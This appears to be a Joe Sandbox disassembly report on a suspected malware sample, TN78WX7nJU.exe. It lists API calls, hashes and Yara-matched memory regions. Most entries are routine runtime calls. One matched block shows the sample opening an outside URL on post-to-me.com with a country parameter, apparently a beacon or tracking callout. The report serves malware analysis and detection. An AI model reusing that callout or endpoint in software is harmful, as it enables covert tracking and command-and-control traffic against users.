                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                • Instruction ID: 634eb2d87e94ed821d7307fdc3aea86e6dd17fac859f214e31ef4a9a8b1c95f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF01236200500DBCE25FF62E690ABABFA6AFC8610310455FD58B07594DF25A946DB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482E8E
                                                                                                                                                                                                                                                                  • Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481328
                                                                                                                                                                                                                                                                  • Part of subcall function 02481321: _wcslen.LIBCMT ref: 02481344
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024830A1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                                • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                                • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                • Instruction ID: 3a708d444c607f1697bd817b8d7f1749b0c8bc1023139c773399686e55acc755
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F5153A5E65344A8E320EFB0BC55B763378FF58712F10543BD528CB2B2E7A19944871E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 024A896A
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 024A8A23
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: fB$csm
                                                                                                                                                                                                                                                                • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                • Instruction ID: df6fa2852c09fe5f23a0799c00fc7f7790f618e07e14ce8f3082f429940796be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4941F430A00248DBCF10DF29C864AAEBFB5FF55328F14816BE9155B391D7329A01CF91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TN78WX7nJU.exe,00000104), ref: 024AF9BA
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024AFA85
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024AFA8F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                                • API String ID: 2506810119-3664027380
                                                                                                                                                                                                                                                                • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                • Instruction ID: 90670392e91c76f0de834511ec291e6364f03e4880f5e8065bfcdd84af91bb2b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5319F71A00218EBDB21DF9ADC909DEBBFCEFA9710B11406BE80597621D7719A45CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TN78WX7nJU.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\TN78WX7nJU.exe
                                                                                                                                                                                                                                                                • API String ID: 2506810119-3664027380
                                                                                                                                                                                                                                                                • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0248C8DE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                                • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                • Instruction ID: e156c074c35c76abf7a167dc6cb9f16a5921ac0b2c9ea4de9ba6ca0abff0be3e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F02BB28902086BCB08F554CC81BEF33989B15316F04806FEE42AB182EB689945CBB4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                • String ID: F(@
                                                                                                                                                                                                                                                                • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                • String ID: F(@
                                                                                                                                                                                                                                                                • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pScheduler
                                                                                                                                                                                                                                                                • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                                                • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pContext
                                                                                                                                                                                                                                                                • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                                • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                                                                                • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                                                • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pScheduler$version
                                                                                                                                                                                                                                                                • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                                • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                • Instruction ID: f0edb284ff9d10d3d76a5d0d67dae2d2e15d3feffadf350e7c9a46ec075d46fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EA136759043869FDB238F28C8917EEFBA6EF15310F58826FD5859B381C7348942CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                • Instruction ID: 095c710ee9e994dcb2b9cfb679337f9f9b236fc9f4050e306e2b2a75d027de5c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36411B31A001016BDB276FBA8C54BEF3A6EEF55770F15062BF42DD6690D73444498A71
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024B047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024B6B51
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024B6BDA
                                                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024B6BEC
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 024B6BF5
                                                                                                                                                                                                                                                                  • Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                • Instruction ID: 63321ccd77c4759da82375cd2f086b743bbe8154c7d3b96501322c6172a1f708
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB31A072A0021AABDF269F65CC80DEF7BB9EF40714B0A426EEC14D7250E735D951CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                                                  • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                                                Memory Dump Source
